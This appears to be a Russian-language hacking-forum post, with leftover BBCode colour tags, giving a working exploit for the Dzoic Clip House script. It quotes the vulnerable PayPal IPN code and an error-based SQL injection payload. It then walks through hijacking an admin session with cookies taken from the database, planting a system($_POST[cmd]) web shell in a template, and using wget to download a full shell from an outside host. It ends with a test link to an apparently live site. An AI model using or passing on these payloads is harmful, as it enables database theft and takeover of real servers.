Dzoic Clip House exploit
URL производителя : http://dzoic.com/
DEMO: http://www.cliphousedemo.com/
Error based sql inj
CODE(/psystems/paypal/paypal_ipn.php):
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]else{
[/COLOR][COLOR="#0000BB"]$sql_query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"DELETE FROM payment_gateway WHERE order_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$paypal[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]ipn_data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'custom'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"DB"[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]execute[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql_query[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
exploit:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.test.com/psystems/paypal/paypal_ipn.php
[/COLOR][COLOR="#0000BB"]post[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]custom[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]=([/COLOR][COLOR="#0000BB"]select 1 from[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]select count[/COLOR][COLOR="#007700"](*),[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]version[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]floor[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]x from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables group by x[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"])
[/COLOR][/COLOR]
Заливка шелла:
1.Если не подобрался админ пасс дергаем админ сессию куки:
mem_id:100000
password:хеш_пароля из бд
sess_id:ид сессии из базы
2.Лезим в редактирование шаблонов "http://test.com/administrator/index.php?section=composer"
3.Создаем новую страницу и туда пихаем
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]}
[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]cmd[/COLOR][COLOR="#007700"]]);
{/[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]}
[/COLOR][/COLOR]
4.Заливаем нормальный шелл :
http://test.com/index.php
post:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]page_name[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]cmd[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]wget[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]O[/COLOR][COLOR="#007700"]./[/COLOR][COLOR="#0000BB"]uploader[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]swf[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//url.com/shell.txt
[/COLOR][/COLOR]
5.Юзаем полноценный шелл по адреcу http://test.com/uploader/tmp/swf.php
TEST LINK:http://vidiload.com/